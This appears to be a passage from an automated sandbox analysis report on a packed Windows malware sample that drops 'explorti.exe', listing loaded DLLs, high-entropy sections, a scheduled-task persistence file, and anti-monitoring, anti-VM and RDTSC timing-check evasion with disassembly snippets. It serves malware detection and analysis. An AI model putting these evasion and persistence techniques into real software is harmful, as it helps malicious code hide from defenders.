                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: gNo9ad9KO4.exeStatic file information: File size 1894912 > 1048576
                    Source: gNo9ad9KO4.exeStatic PE information: Raw size of adkjkfkz is bigger than: 0x100000 < 0x19d200

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeUnpacked PE file: 0.2.gNo9ad9KO4.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 1.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 2.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 7.2.explorti.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;adkjkfkz:EW;afyvsewm:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: explorti.exe.0.drStatic PE information: real checksum: 0x1d691a should be: 0x1d810c
                    Source: gNo9ad9KO4.exeStatic PE information: real checksum: 0x1d691a should be: 0x1d810c
                    Source: gNo9ad9KO4.exeStatic PE information: section name:
                    Source: gNo9ad9KO4.exeStatic PE information: section name: .idata
                    Source: gNo9ad9KO4.exeStatic PE information: section name:
                    Source: gNo9ad9KO4.exeStatic PE information: section name: adkjkfkz
                    Source: gNo9ad9KO4.exeStatic PE information: section name: afyvsewm
                    Source: gNo9ad9KO4.exeStatic PE information: section name: .taggant
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: adkjkfkz
                    Source: explorti.exe.0.drStatic PE information: section name: afyvsewm
                    Source: explorti.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 7_2_00EAD82C push ecx; ret 7_2_00EAD83F
                    Source: gNo9ad9KO4.exeStatic PE information: section name: entropy: 7.988500981589288
                    Source: gNo9ad9KO4.exeStatic PE information: section name: adkjkfkz entropy: 7.953327902515579
                    Source: explorti.exe.0.drStatic PE information: section name: entropy: 7.988500981589288
                    Source: explorti.exe.0.drStatic PE information: section name: adkjkfkz entropy: 7.953327902515579
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJump to dropped file

                    Boot Survival

                    barindex
                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 1CF6C0 second address: 1CEE86 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 clc 0x0000000a push dword ptr [ebp+122D02D1h] 0x00000010 jmp 00007F4688C929DEh 0x00000015 call dword ptr [ebp+122D34DBh] 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D1AD8h], ecx 0x00000022 xor eax, eax 0x00000024 cld 0x00000025 mov edx, dword ptr [esp+28h] 0x00000029 jmp 00007F4688C929E9h 0x0000002e mov dword ptr [ebp+122D3B28h], eax 0x00000034 add dword ptr [ebp+122D1AD8h], ebx 0x0000003a mov esi, 0000003Ch 0x0000003f mov dword ptr [ebp+122D1AD8h], esi 0x00000045 mov dword ptr [ebp+122D1AD8h], esi 0x0000004b add esi, dword ptr [esp+24h] 0x0000004f clc 0x00000050 lodsw 0x00000052 clc 0x00000053 add eax, dword ptr [esp+24h] 0x00000057 or dword ptr [ebp+122D1AD8h], ebx 0x0000005d mov ebx, dword ptr [esp+24h] 0x00000061 jmp 00007F4688C929DCh 0x00000066 nop 0x00000067 pushad 0x00000068 push edx 0x00000069 jmp 00007F4688C929DAh 0x0000006e pop edx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F4688C929E8h 0x00000076 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 33D244 second address: 33D25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B774h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 33D25C second address: 33D285 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4688C929D6h 0x00000008 jnc 00007F4688C929D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C929E5h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 33D285 second address: 33D29F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4688C1B766h 0x00000008 jmp 00007F4688C1B770h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 33D29F second address: 33D2B6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4688C929DAh 0x00000008 pushad 0x00000009 ja 00007F4688C929D6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 33C07C second address: 33C099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4688C1B766h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F4688C1B76Eh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 33C099 second address: 33C09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 33C74D second address: 33C753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 34013F second address: 340144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 340144 second address: 34015E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B776h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 34015E second address: 340185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4688C929DDh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 340185 second address: 34018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 34018B second address: 34018F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 34018F second address: 3401E0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F4688C1B771h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007F4688C1B76Ch 0x00000018 pop eax 0x00000019 mov dword ptr [ebp+122D33C2h], eax 0x0000001f stc 0x00000020 push 00000003h 0x00000022 mov dword ptr [ebp+122D17A2h], edx 0x00000028 push 00000000h 0x0000002a mov dh, 0Bh 0x0000002c push 00000003h 0x0000002e mov dword ptr [ebp+122D17A2h], ecx 0x00000034 push 9465B82Bh 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3401E0 second address: 3401EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4688C929D6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3403A2 second address: 3403AC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3403AC second address: 3403B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3403B1 second address: 3403B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3403B7 second address: 3403F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F4688C929D8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D3C04h] 0x0000002a push 00000000h 0x0000002c mov dh, 62h 0x0000002e push D0F05AC1h 0x00000033 push ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3403F9 second address: 340480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a add dword ptr [esp], 2F0FA5BFh 0x00000011 sub si, 5E7Ah 0x00000016 push 00000003h 0x00000018 add dword ptr [ebp+122D36A9h], edx 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 push ecx 0x00000022 mov dx, di 0x00000025 pop ecx 0x00000026 pop edi 0x00000027 push 00000003h 0x00000029 push 59A1D9F2h 0x0000002e jmp 00007F4688C1B770h 0x00000033 add dword ptr [esp], 665E260Eh 0x0000003a mov edx, dword ptr [ebp+122D3AB8h] 0x00000040 lea ebx, dword ptr [ebp+1244502Ch] 0x00000046 push esi 0x00000047 jmp 00007F4688C1B772h 0x0000004c pop ecx 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 js 00007F4688C1B777h 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 361403 second address: 361409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 361409 second address: 36140F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36140F second address: 361424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push esi 0x0000000d jne 00007F4688C929D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32A50D second address: 32A52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F4688C1B76Ch 0x0000000e jnc 00007F4688C1B766h 0x00000014 jg 00007F4688C1B76Ch 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32A52D second address: 32A543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35F3FA second address: 35F3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35F3FE second address: 35F40A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F4688C929D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35F56D second address: 35F57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35F6D7 second address: 35F6DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35F6DF second address: 35F6E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35FB1A second address: 35FB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35FB1E second address: 35FB22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35FB22 second address: 35FB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3602E5 second address: 3602EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3602EC second address: 3602F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 35737C second address: 3573B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ah 0x00000007 push esi 0x00000008 jmp 00007F4688C1B776h 0x0000000d jo 00007F4688C1B766h 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edi 0x00000018 jnp 00007F4688C1B766h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3605C1 second address: 3605C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3605C7 second address: 3605CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3605CB second address: 3605CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3605CF second address: 3605F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4688C1B779h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3605F2 second address: 3605F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3605F6 second address: 360616 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F4688C1B766h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B772h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 360D8E second address: 360D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 360D92 second address: 360DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F4688C1B766h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32A529 second address: 32A52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36101E second address: 361028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4688C1B766h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 361028 second address: 361030 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 361030 second address: 361038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 361038 second address: 36103C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3612BA second address: 3612C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3612C0 second address: 3612C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36384F second address: 363855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 363855 second address: 363898 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jo 00007F4688C929E4h 0x00000012 pushad 0x00000013 jnl 00007F4688C929D6h 0x00000019 jo 00007F4688C929D6h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 jmp 00007F4688C929E4h 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e jl 00007F4688C929D6h 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 36215D second address: 362161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3628A6 second address: 3628AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 364CDD second address: 364CE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
